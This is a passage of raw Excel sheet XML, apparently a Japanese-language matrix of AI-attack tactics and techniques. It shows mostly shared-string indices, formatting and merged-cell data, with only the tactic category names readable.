      <c r="E7" s="30" t="s">
        <v>233</v>
      </c>
      <c r="M7" s="30" t="s">
        <v>300</v>
      </c>
      <c r="P7" s="22" t="s">
        <v>193</v>
      </c>
      <c r="Q7" s="31" t="s">
        <v>203</v>
      </c>
      <c r="S7" s="22" t="s">
        <v>133</v>
      </c>
      <c r="T7" s="31" t="s">
        <v>556</v>
      </c>
      <c r="V7" s="30" t="s">
        <v>330</v>
      </c>
      <c r="X7" s="22" t="s">
        <v>255</v>
      </c>
      <c r="Y7" s="31" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="8" spans="1:25">
      <c r="A8" s="33"/>
      <c r="B8" s="31" t="s">
        <v>551</v>
      </c>
      <c r="C8" s="30" t="s">
        <v>347</v>
      </c>
      <c r="E8" s="30" t="s">
        <v>250</v>
      </c>
      <c r="M8" s="30" t="s">
        <v>335</v>
      </c>
      <c r="P8" s="33"/>
      <c r="Q8" s="31" t="s">
        <v>424</v>
      </c>
      <c r="S8" s="33"/>
      <c r="T8" s="31" t="s">
        <v>561</v>
      </c>
      <c r="V8" s="30" t="s">
        <v>368</v>
      </c>
      <c r="W8" s="31" t="s">
        <v>506</v>
      </c>
      <c r="X8" s="33"/>
      <c r="Y8" s="31" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="9" spans="1:25">
      <c r="A9" s="30" t="s">
        <v>501</v>
      </c>
      <c r="C9" s="22" t="s">
        <v>414</v>
      </c>
      <c r="D9" s="31" t="s">
        <v>69</v>
      </c>
      <c r="E9" s="30" t="s">
        <v>419</v>
      </c>
      <c r="F9" s="31" t="s">
        <v>526</v>
      </c>
      <c r="M9" s="30" t="s">
        <v>357</v>
      </c>
      <c r="P9" s="22" t="s">
        <v>198</v>
      </c>
      <c r="Q9" s="31" t="s">
        <v>531</v>
      </c>
      <c r="S9" s="33"/>
      <c r="T9" s="31" t="s">
        <v>577</v>
      </c>
      <c r="X9" s="33"/>
      <c r="Y9" s="31" t="s">
        <v>470</v>
      </c>
    </row>
    <row r="10" spans="3:25">
      <c r="C10" s="33"/>
      <c r="D10" s="31" t="s">
        <v>516</v>
      </c>
      <c r="E10" s="30" t="s">
        <v>592</v>
      </c>
      <c r="M10" s="30" t="s">
        <v>373</v>
      </c>
      <c r="P10" s="33"/>
      <c r="Q10" s="31" t="s">
        <v>541</v>
      </c>
      <c r="S10" s="22" t="s">
        <v>383</v>
      </c>
      <c r="T10" s="31" t="s">
        <v>409</v>
      </c>
      <c r="X10" s="33"/>
      <c r="Y10" s="31" t="s">
        <v>511</v>
      </c>
    </row>
    <row r="11" spans="3:25">
      <c r="C11" s="30" t="s">
        <v>439</v>
      </c>
      <c r="M11" s="30" t="s">
        <v>394</v>
      </c>
      <c r="P11" s="33"/>
      <c r="Q11" s="31" t="s">
        <v>546</v>
      </c>
      <c r="S11" s="33"/>
      <c r="T11" s="31" t="s">
        <v>434</v>
      </c>
      <c r="X11" s="33"/>
      <c r="Y11" s="31" t="s">
        <v>587</v>
      </c>
    </row>
    <row r="12" spans="3:24">
      <c r="C12" s="30" t="s">
        <v>450</v>
      </c>
      <c r="S12" s="30" t="s">
        <v>597</v>
      </c>
      <c r="X12" s="30" t="s">
        <v>521</v>
      </c>
    </row>
    <row r="13" spans="3:3">
      <c r="C13" s="30" t="s">
        <v>455</v>
      </c>
    </row>
    <row r="14" spans="3:3">
      <c r="C14" s="30" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="15" spans="3:3">
      <c r="C15" s="30" t="s">
        <v>475</v>
      </c>
    </row>
    <row r="16" spans="3:3">
      <c r="C16" s="30" t="s">
        <v>536</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="25">
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="C1:D1"/>
    <mergeCell ref="E1:F1"/>
    <mergeCell ref="H1:I1"/>
    <mergeCell ref="J1:K1"/>
    <mergeCell ref="M1:N1"/>
    <mergeCell ref="P1:Q1"/>
    <mergeCell ref="S1:T1"/>
    <mergeCell ref="V1:W1"/>
    <mergeCell ref="X1:Y1"/>
    <mergeCell ref="A6:A8"/>
    <mergeCell ref="C2:C3"/>
    <mergeCell ref="C4:C5"/>
    <mergeCell ref="C9:C10"/>
    <mergeCell ref="E2:E5"/>
    <mergeCell ref="H4:H5"/>
    <mergeCell ref="J3:J4"/>
    <mergeCell ref="M4:M6"/>
    <mergeCell ref="P7:P8"/>
    <mergeCell ref="P9:P11"/>
    <mergeCell ref="S2:S6"/>
    <mergeCell ref="S7:S9"/>
    <mergeCell ref="S10:S11"/>
    <mergeCell ref="V2:V4"/>
    <mergeCell ref="X7:X1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6"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="A1" sqref="A1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="19.0925925925926" style="21" customWidth="1"/>
    <col min="2" max="2" width="57.0925925925926" style="22" customWidth="1"/>
    <col min="3" max="3" width="44.9074074074074" style="21" customWidth="1"/>
    <col min="4" max="4" width="255.638888888889" style="22" customWidth="1"/>
    <col min="5" max="5" width="64.1851851851852" style="22" customWidth="1"/>
    <col min="6" max="7" width="15.7314814814815" style="21" customWidth="1"/>
    <col min="8" max="8" width="44" style="21" customWidth="1"/>
    <col min="9" max="9" width="22.0833333333333" style="21" customWidth="1"/>
    <col min="10" max="16384" width="9" style="21"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9">
      <c r="A1" s="13" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="13" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="13" t="s">
        <v>797</v>
      </c>
      <c r="D1" s="13" t="s">
        <v>798</v>
      </c>
      <c r="E1" s="13" t="s">
        <v>799</v>
      </c>
      <c r="F1" s="13" t="s">
        <v>800</v>
      </c>
      <c r="G1" s="13" t="s">
        <v>801</v>
      </c>
      <c r="H1" s="13" t="s">
        <v>802</v>
      </c>
      <c r="I1" s="24" t="s">
        <v>803</v>
      </c>
    </row>
    <row r="2" spans="1:9">
      <c r="A2" s="14" t="s">
        <v>9</v>
      </c>
      <c r="B2" s="15" t="s">
        <v>10</v>
      </c>
      <c r="C2" s="15" t="s">
        <v>804</v>
      </c>
      <c r="D2" s="19" t="s">
        <v>805</v>
      </c>
      <c r="E2" s="16" t="s">
        <v>13</v>
      </c>
      <c r="F2" s="17">
        <v>45769</v>
      </c>
      <c r="G2" s="17">
        <v>45769</v>
      </c>
      <c r="H2" s="14" t="str">
        <f>'tactics (ja)'!$C$4</f>
        <v>収集</v>
      </c>
      <c r="I2" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="3" ht="30" spans="1:9">
      <c r="A3" s="14" t="s">
        <v>17</v>
      </c>
      <c r="B3" s="15" t="s">
        <v>18</v>
      </c>
      <c r="C3" s="14" t="s">
        <v>806</v>
      </c>
      <c r="D3" s="15" t="s">
        <v>807</v>
      </c>
      <c r="E3" s="20" t="s">
        <v>21</v>
      </c>
      <c r="F3" s="17">
        <v>45769</v>
      </c>
      <c r="G3" s="17">
        <v>45769</v>
      </c>
      <c r="H3" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I3" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="4" ht="75" spans="1:9">
      <c r="A4" s="14" t="s">
        <v>23</v>
      </c>
      <c r="B4" s="15" t="s">
        <v>24</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>808</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>809</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>27</v>
      </c>
      <c r="F4" s="17">
        <v>45769</v>
      </c>
      <c r="G4" s="17">
        <v>45769</v>
      </c>
      <c r="H4" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I4" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="5" ht="75" spans="1:9">
      <c r="A5" s="14" t="s">
        <v>29</v>
      </c>
      <c r="B5" s="15" t="s">
        <v>30</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>810</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>811</v>
      </c>
      <c r="E5" s="20" t="s">
        <v>33</v>
      </c>
      <c r="F5" s="17">
        <v>45769</v>
      </c>
      <c r="G5" s="17">
        <v>45769</v>
      </c>
      <c r="H5" s="14" t="str">
        <f>'tactics (ja)'!$C$3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="I5" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="6" ht="30" spans="1:9">
      <c r="A6" s="14" t="s">
        <v>35</v>
      </c>
      <c r="B6" s="15" t="s">
        <v>36</v>
      </c>
      <c r="C6" s="14" t="s">
        <v>812</v>
      </c>
      <c r="D6" s="15" t="s">
        <v>813</v>
      </c>
      <c r="E6" s="20" t="s">
        <v>39</v>
      </c>
      <c r="F6" s="17">
        <v>45769</v>
      </c>
      <c r="G6" s="17">
        <v>45769</v>
      </c>
      <c r="H6" s="14" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I6" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="7" ht="45" spans="1:9">
      <c r="A7" s="14" t="s">
        <v>41</v>
      </c>
      <c r="B7" s="15" t="s">
        <v>42</v>
      </c>
      <c r="C7" s="14" t="s">
        <v>814</v>
      </c>
      <c r="D7" s="15" t="s">
        <v>815</v>
      </c>
      <c r="E7" s="16" t="s">
        <v>45</v>
      </c>
      <c r="F7" s="17">
        <v>45769</v>
      </c>
      <c r="G7" s="17">
        <v>45769</v>
      </c>
      <c r="H7" s="14" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I7" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="8" spans="1:9">
      <c r="A8" s="14" t="s">
        <v>46</v>
      </c>
      <c r="B8" s="15" t="s">
        <v>47</v>
      </c>
      <c r="C8" s="14" t="s">
        <v>816</v>
      </c>
      <c r="D8" s="15" t="s">
        <v>817</v>
      </c>
      <c r="E8" s="16" t="s">
        <v>50</v>
      </c>
      <c r="F8" s="17">
        <v>45769</v>
      </c>
      <c r="G8" s="17">
        <v>45769</v>
      </c>
      <c r="H8" s="14" t="str">
        <f>'tactics (ja)'!$C$3</f>
        <v>AI モデルへのアクセス</v>
      </c>
      <c r="I8" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="9" ht="75" spans="1:9">
      <c r="A9" s="14" t="s">
        <v>51</v>
      </c>
      <c r="B9" s="15" t="s">
        <v>52</v>
      </c>
      <c r="C9" s="19" t="s">
        <v>818</v>
      </c>
      <c r="D9" s="19" t="s">
        <v>819</v>
      </c>
      <c r="E9" s="20" t="s">
        <v>55</v>
      </c>
      <c r="F9" s="17">
        <v>45769</v>
      </c>
      <c r="G9" s="17">
        <v>45769</v>
      </c>
      <c r="H9" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I9" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="10" ht="120" spans="1:9">
      <c r="A10" s="14" t="s">
        <v>56</v>
      </c>
      <c r="B10" s="15" t="s">
        <v>57</v>
      </c>
      <c r="C10" s="14" t="s">
        <v>820</v>
      </c>
      <c r="D10" s="15" t="s">
        <v>821</v>
      </c>
      <c r="E10" s="16" t="s">
        <v>60</v>
      </c>
      <c r="F10" s="17">
        <v>45769</v>
      </c>
      <c r="G10" s="17">
        <v>45769</v>
      </c>
      <c r="H10" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I10" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="11" spans="1:9">
      <c r="A11" s="14" t="s">
        <v>61</v>
      </c>
      <c r="B11" s="15" t="s">
        <v>62</v>
      </c>
      <c r="C11" s="19" t="s">
        <v>822</v>
      </c>
      <c r="D11" s="19" t="s">
        <v>823</v>
      </c>
      <c r="E11" s="16" t="s">
        <v>65</v>
      </c>
      <c r="F11" s="17">
        <v>45769</v>
      </c>
      <c r="G11" s="17">
        <v>45769</v>
      </c>
      <c r="H11" s="14" t="str">
        <f>'tactics (ja)'!$C$15</f>
        <v>偵察</v>
      </c>
      <c r="I11" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="12" ht="30" spans="1:9">
      <c r="A12" s="14" t="s">
        <v>67</v>
      </c>
      <c r="B12" s="15" t="s">
        <v>68</v>
      </c>
      <c r="C12" s="19" t="s">
        <v>824</v>
      </c>
      <c r="D12" s="15" t="s">
        <v>825</v>
      </c>
      <c r="E12" s="16" t="s">
        <v>71</v>
      </c>
      <c r="F12" s="17">
        <v>45769</v>
      </c>
      <c r="G12" s="17">
        <v>45769</v>
      </c>
      <c r="H12" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I12" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="13" ht="30" spans="1:9">
      <c r="A13" s="14" t="s">
        <v>72</v>
      </c>
      <c r="B13" s="15" t="s">
        <v>73</v>
      </c>
      <c r="C13" s="14" t="s">
        <v>826</v>
      </c>
      <c r="D13" s="15" t="s">
        <v>827</v>
      </c>
      <c r="E13" s="16" t="s">
        <v>76</v>
      </c>
      <c r="F13" s="17">
        <v>45769</v>
      </c>
      <c r="G13" s="17">
        <v>45769</v>
      </c>
      <c r="H13" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I13" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="14" ht="30" spans="1:9">
      <c r="A14" s="14" t="s">
        <v>77</v>
      </c>
      <c r="B14" s="15" t="s">
        <v>78</v>
      </c>
      <c r="C14" s="14" t="s">
        <v>828</v>
      </c>
      <c r="D14" s="19" t="s">
        <v>829</v>
      </c>
      <c r="E14" s="20" t="s">
        <v>81</v>
      </c>
      <c r="F14" s="17">
        <v>45769</v>
      </c>
      <c r="G14" s="17">
        <v>45769</v>
      </c>
      <c r="H14" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I14" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="15" ht="45" spans="1:9">
      <c r="A15" s="14" t="s">
        <v>83</v>
      </c>
      <c r="B15" s="15" t="s">
        <v>84</v>
      </c>
      <c r="C15" s="14" t="s">
        <v>830</v>
      </c>
      <c r="D15" s="19" t="s">
        <v>831</v>
      </c>
      <c r="E15" s="16" t="s">
        <v>87</v>
      </c>
      <c r="F15" s="17">
        <v>45769</v>
      </c>
      <c r="G15" s="17">
        <v>45769</v>
      </c>
      <c r="H15" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I15" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="16" spans="1:9">
      <c r="A16" s="14" t="s">
        <v>88</v>
      </c>
      <c r="B16" s="15" t="s">
        <v>89</v>
      </c>
      <c r="C16" s="14" t="s">
        <v>832</v>
      </c>
      <c r="D16" s="15" t="s">
        <v>833</v>
      </c>
      <c r="E16" s="16" t="s">
        <v>92</v>
      </c>
      <c r="F16" s="17">
        <v>45769</v>
      </c>
      <c r="G16" s="17">
        <v>45769</v>
      </c>
      <c r="H16" s="14" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I16" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="17" ht="135" spans="1:9">
      <c r="A17" s="14" t="s">
        <v>94</v>
      </c>
      <c r="B17" s="15" t="s">
        <v>95</v>
      </c>
      <c r="C17" s="14" t="s">
        <v>834</v>
      </c>
      <c r="D17" s="15" t="s">
        <v>835</v>
      </c>
      <c r="E17" s="16" t="s">
        <v>98</v>
      </c>
      <c r="F17" s="17">
        <v>45769</v>
      </c>
      <c r="G17" s="17">
        <v>45769</v>
      </c>
      <c r="H17" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I17" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="18" ht="105" spans="1:9">
      <c r="A18" s="14" t="s">
        <v>100</v>
      </c>
      <c r="B18" s="15" t="s">
        <v>101</v>
      </c>
      <c r="C18" s="19" t="s">
        <v>836</v>
      </c>
      <c r="D18" s="19" t="s">
        <v>837</v>
      </c>
      <c r="E18" s="16" t="s">
        <v>104</v>
      </c>
      <c r="F18" s="17">
        <v>45769</v>
      </c>
      <c r="G18" s="17">
        <v>45769</v>
      </c>
      <c r="H18" s="14" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I18" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="19" spans="1:9">
      <c r="A19" s="14" t="s">
        <v>106</v>
      </c>
      <c r="B19" s="15" t="s">
        <v>107</v>
      </c>
      <c r="C19" s="19" t="s">
        <v>838</v>
      </c>
      <c r="D19" s="19" t="s">
        <v>839</v>
      </c>
      <c r="E19" s="16" t="s">
        <v>110</v>
      </c>
      <c r="F19" s="17">
        <v>45769</v>
      </c>
      <c r="G19" s="17">
        <v>45769</v>
      </c>
      <c r="H19" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I19" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="20" ht="60" spans="1:9">
      <c r="A20" s="14" t="s">
        <v>111</v>
      </c>
      <c r="B20" s="15" t="s">
        <v>112</v>
      </c>
      <c r="C20" s="14" t="s">
        <v>840</v>
      </c>
      <c r="D20" s="15" t="s">
        <v>841</v>
      </c>
      <c r="E20" s="16" t="s">
        <v>115</v>
      </c>
      <c r="F20" s="17">
        <v>45769</v>
      </c>
      <c r="G20" s="17">
        <v>45769</v>
      </c>
      <c r="H20" s="14" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I20" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="21" ht="30" spans="1:9">
      <c r="A21" s="14" t="s">
        <v>116</v>
      </c>
      <c r="B21" s="15" t="s">
        <v>117</v>
      </c>
      <c r="C21" s="14" t="s">
        <v>842</v>
      </c>
      <c r="D21" s="15" t="s">
        <v>843</v>
      </c>
      <c r="E21" s="16" t="s">
        <v>120</v>
      </c>
      <c r="F21" s="17">
        <v>45769</v>
      </c>
      <c r="G21" s="17">
        <v>45769</v>
      </c>
      <c r="H21" s="14" t="str">
        <f>'tactics (ja)'!$C$7</f>
        <v>防御策の回避</v>
      </c>
      <c r="I21" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="22" spans="1:9">
      <c r="A22" s="14" t="s">
        <v>121</v>
      </c>
      <c r="B22" s="15" t="s">
        <v>122</v>
      </c>
      <c r="C22" s="19" t="s">
        <v>844</v>
      </c>
      <c r="D22" s="19" t="s">
        <v>845</v>
      </c>
      <c r="E22" s="16" t="s">
        <v>125</v>
      </c>
      <c r="F22" s="17">
        <v>45769</v>
      </c>
      <c r="G22" s="17">
        <v>45769</v>
      </c>
      <c r="H22" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I22" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="23" ht="120" spans="1:9">
      <c r="A23" s="14" t="s">
        <v>126</v>
      </c>
      <c r="B23" s="15" t="s">
        <v>127</v>
      </c>
      <c r="C23" s="19" t="s">
        <v>846</v>
      </c>
      <c r="D23" s="19" t="s">
        <v>847</v>
      </c>
      <c r="E23" s="16" t="s">
        <v>130</v>
      </c>
      <c r="F23" s="17">
        <v>45769</v>
      </c>
      <c r="G23" s="17">
        <v>45769</v>
      </c>
      <c r="H23" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I23" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="24" ht="45" spans="1:9">
      <c r="A24" s="14" t="s">
        <v>131</v>
      </c>
      <c r="B24" s="15" t="s">
        <v>132</v>
      </c>
      <c r="C24" s="19" t="s">
        <v>848</v>
      </c>
      <c r="D24" s="19" t="s">
        <v>849</v>
      </c>
      <c r="E24" s="16" t="s">
        <v>135</v>
      </c>
      <c r="F24" s="17">
        <v>45769</v>
      </c>
      <c r="G24" s="17">
        <v>45769</v>
      </c>
      <c r="H24" s="14" t="str">
        <f>'tactics (ja)'!$C$2</f>
        <v>AI 攻撃のステージング</v>
      </c>
      <c r="I24" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="25" ht="60" spans="1:9">
      <c r="A25" s="14" t="s">
        <v>136</v>
      </c>
      <c r="B25" s="15" t="s">
        <v>137</v>
      </c>
      <c r="C25" s="14" t="s">
        <v>850</v>
      </c>
      <c r="D25" s="19" t="s">
        <v>851</v>
      </c>
      <c r="E25" s="16" t="s">
        <v>140</v>
      </c>
      <c r="F25" s="17">
        <v>45769</v>
      </c>
      <c r="G25" s="17">
        <v>45769</v>
      </c>
      <c r="H25" s="14" t="str">
        <f>'tactics (ja)'!$C$12</f>
        <v>初期アクセス</v>
      </c>
      <c r="I25" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="26" ht="75" spans="1:9">
      <c r="A26" s="14" t="s">
        <v>141</v>
      </c>
      <c r="B26" s="15" t="s">
        <v>142</v>
      </c>
      <c r="C26" s="19" t="s">
        <v>852</v>
      </c>
      <c r="D26" s="19" t="s">
        <v>853</v>
      </c>
      <c r="E26" s="16" t="s">
        <v>145</v>
      </c>
      <c r="F26" s="17">
        <v>45769</v>
      </c>
      <c r="G26" s="17">
        <v>45769</v>
      </c>
      <c r="H26" s="14" t="str">
        <f>'tactics (ja)'!$C$4</f>
        <v>収集</v>
      </c>
      <c r="I26" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="27" ht="45" spans="1:9">
      <c r="A27" s="14" t="s">
        <v>146</v>
      </c>
      <c r="B27" s="15" t="s">
        <v>147</v>
      </c>
      <c r="C27" s="14" t="s">
        <v>854</v>
      </c>
      <c r="D27" s="19" t="s">
        <v>855</v>
      </c>
      <c r="E27" s="16" t="s">
        <v>150</v>
      </c>
      <c r="F27" s="17">
        <v>45769</v>
      </c>
      <c r="G27" s="17">
        <v>45769</v>
      </c>
      <c r="H27" s="14" t="str">
        <f>'tactics (ja)'!$C$4</f>
        <v>収集</v>
      </c>
      <c r="I27" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="28" ht="60" spans="1:9">
      <c r="A28" s="14" t="s">
        <v>151</v>
      </c>
      <c r="B28" s="15" t="s">
        <v>152</v>
      </c>
      <c r="C28" s="14" t="s">
        <v>856</v>
      </c>
      <c r="D28" s="19" t="s">
        <v>857</v>
      </c>
      <c r="E28" s="16" t="s">
        <v>155</v>
      </c>
      <c r="F28" s="17">
        <v>45769</v>
      </c>
      <c r="G28" s="17">
        <v>45769</v>
      </c>
      <c r="H28" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I28" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="29" ht="30" spans="1:9">
      <c r="A29" s="14" t="s">
        <v>156</v>
      </c>
      <c r="B29" s="15" t="s">
        <v>157</v>
      </c>
      <c r="C29" s="14" t="s">
        <v>858</v>
      </c>
      <c r="D29" s="19" t="s">
        <v>859</v>
      </c>
      <c r="E29" s="20" t="s">
        <v>160</v>
      </c>
      <c r="F29" s="17">
        <v>45769</v>
      </c>
      <c r="G29" s="17">
        <v>45769</v>
      </c>
      <c r="H29" s="14" t="str">
        <f>'tactics (ja)'!$C$11</f>
        <v>影響</v>
      </c>
      <c r="I29" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="30" ht="30" spans="1:9">
      <c r="A30" s="14" t="s">
        <v>161</v>
      </c>
      <c r="B30" s="15" t="s">
        <v>162</v>
      </c>
      <c r="C30" s="14" t="s">
        <v>860</v>
      </c>
      <c r="D30" s="19" t="s">
        <v>861</v>
      </c>
      <c r="E30" s="16" t="s">
        <v>165</v>
      </c>
      <c r="F30" s="17">
        <v>45769</v>
      </c>
      <c r="G30" s="17">
        <v>45769</v>
      </c>
      <c r="H30" s="14" t="str">
        <f>'tactics (ja)'!$C$16</f>
        <v>リソースの開発</v>
      </c>
      <c r="I30" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="31" ht="30" spans="1:9">
      <c r="A31" s="14" t="s">
        <v>166</v>
      </c>
      <c r="B31" s="15" t="s">
        <v>167</v>
      </c>
      <c r="C31" s="14" t="s">
        <v>862</v>
      </c>
      <c r="D31" s="19" t="s">
        <v>863</v>
      </c>
      <c r="E31" s="16" t="s">
        <v>170</v>
      </c>
      <c r="F31" s="17">
        <v>45769</v>
      </c>
      <c r="G31" s="17">
        <v>45769</v>
      </c>
      <c r="H31" s="14" t="str">
        <f>'tactics (ja)'!$C$9</f>
        <v>実行</v>
      </c>
      <c r="I31" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="32" ht="60" spans="1:9">
      <c r="A32" s="14" t="s">
        <v>171</v>
      </c>
      <c r="B32" s="15" t="s">
        <v>172</v>
      </c>
      <c r="C32" s="14" t="s">
        <v>864</v>
      </c>
      <c r="D32" s="19" t="s">
        <v>865</v>
      </c>
      <c r="E32" s="16" t="s">
        <v>175</v>
      </c>
      <c r="F32" s="17">
        <v>45769</v>
      </c>
      <c r="G32" s="17">
        <v>45769</v>
      </c>
      <c r="H32" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I32" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="33" ht="45" spans="1:9">
      <c r="A33" s="14" t="s">
        <v>176</v>
      </c>
      <c r="B33" s="15" t="s">
        <v>177</v>
      </c>
      <c r="C33" s="19" t="s">
        <v>866</v>
      </c>
      <c r="D33" s="19" t="s">
        <v>867</v>
      </c>
      <c r="E33" s="16" t="s">
        <v>180</v>
      </c>
      <c r="F33" s="17">
        <v>45769</v>
      </c>
      <c r="G33" s="17">
        <v>45769</v>
      </c>
      <c r="H33" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I33" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="34" ht="60" spans="1:9">
      <c r="A34" s="14" t="s">
        <v>181</v>
      </c>
      <c r="B34" s="15" t="s">
        <v>182</v>
      </c>
      <c r="C34" s="19" t="s">
        <v>868</v>
      </c>
      <c r="D34" s="19" t="s">
        <v>869</v>
      </c>
      <c r="E34" s="16" t="s">
        <v>185</v>
      </c>
      <c r="F34" s="17">
        <v>45769</v>
      </c>
      <c r="G34" s="17">
        <v>45769</v>
      </c>
      <c r="H34" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I34" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="35" spans="1:9">
      <c r="A35" s="14" t="s">
        <v>186</v>
      </c>
      <c r="B35" s="15" t="s">
        <v>187</v>
      </c>
      <c r="C35" s="14" t="s">
        <v>870</v>
      </c>
      <c r="D35" s="15" t="s">
        <v>871</v>
      </c>
      <c r="E35" s="16" t="s">
        <v>190</v>
      </c>
      <c r="F35" s="17">
        <v>45769</v>
      </c>
      <c r="G35" s="17">
        <v>45769</v>
      </c>
      <c r="H35" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I35" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="36" ht="30" spans="1:9">
      <c r="A36" s="14" t="s">
        <v>191</v>
      </c>
      <c r="B36" s="15" t="s">
        <v>192</v>
      </c>
      <c r="C36" s="14" t="s">
        <v>872</v>
      </c>
      <c r="D36" s="15" t="s">
        <v>873</v>
      </c>
      <c r="E36" s="16" t="s">
        <v>195</v>
      </c>
      <c r="F36" s="17">
        <v>45769</v>
      </c>
      <c r="G36" s="17">
        <v>45769</v>
      </c>
      <c r="H36" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I36" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="37" ht="30" spans="1:9">
      <c r="A37" s="14" t="s">
        <v>196</v>
      </c>
      <c r="B37" s="15" t="s">
        <v>197</v>
      </c>
      <c r="C37" s="14" t="s">
        <v>874</v>
      </c>
      <c r="D37" s="15" t="s">
        <v>875</v>
      </c>
      <c r="E37" s="16" t="s">
        <v>200</v>
      </c>
      <c r="F37" s="17">
        <v>45769</v>
      </c>
      <c r="G37" s="17">
        <v>45769</v>
      </c>
      <c r="H37" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
      <c r="I37" s="14" t="s">
        <v>16</v>
      </c>
    </row>
    <row r="38" ht="60" spans="1:9">
      <c r="A38" s="14" t="s">
        <v>201</v>
      </c>
      <c r="B38" s="15" t="s">
        <v>202</v>
      </c>
      <c r="C38" s="14" t="s">
        <v>876</v>
      </c>
      <c r="D38" s="15" t="s">
        <v>877</v>
      </c>
      <c r="E38" s="16" t="s">
        <v>205</v>
      </c>
      <c r="F38" s="17">
        <v>45769</v>
      </c>
      <c r="G38" s="17">
        <v>45769</v>
      </c>
      <c r="H38" s="14" t="str">
        <f>'tactics (ja)'!$C$8</f>
        <v>探索</v>
      </c>
